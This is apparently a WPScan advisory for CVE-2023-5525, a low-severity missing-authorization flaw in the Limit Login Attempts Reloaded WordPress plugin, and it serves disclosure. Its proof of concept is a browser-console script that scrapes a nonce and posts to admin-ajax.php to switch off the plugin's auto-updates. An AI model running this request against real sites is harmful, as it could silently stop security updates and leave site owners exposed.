WordPress Plugin Vulnerabilities

Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update

Description

The plugin is missing authorization on the `toggle_auto_update` AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

Proof of Concept

As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
await (await fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=toggle_auto_update&value=no&sec=" + nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})).text();

Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.

Affects Plugins

Plugin icon
limit-login-attempts-reloaded
Fixed in 2.25.26

References

CVE
CVE-2023-5525

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
2.7 (low)

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
654bad15-1c88-446a-b28b-5a412cc0399d

Timeline

Publicly Published
2023-11-06 (about 7 months ago)
Added
2023-11-06 (about 7 months ago)
Last Updated
2023-11-06 (about 7 months ago)

Other

Published
Title
Published
2024-06-07
Title
Minimal Coming Soon – Coming Soon Page < 2.39 - Missing Authorization to Limited Settings Change
Published
2024-04-05
Title
Bricksforge < 2.1.1 - Missing Authorization to Unauthenticated Arbitrary Email Sending
Published
2024-05-16
Title
ReviewX – Multi-criteria Rating & Reviews for WooCommerce < 1.6.28 - Missing Authorization
Published
2023-12-21
Title
EazyDocs < 2.3.6 - Subscriber+ Arbitrary Posts Deletion and Document Management
Published
2023-10-25
Title
WP EXtra < 6.3 - Missing Authorization to Arbitrary Email Sending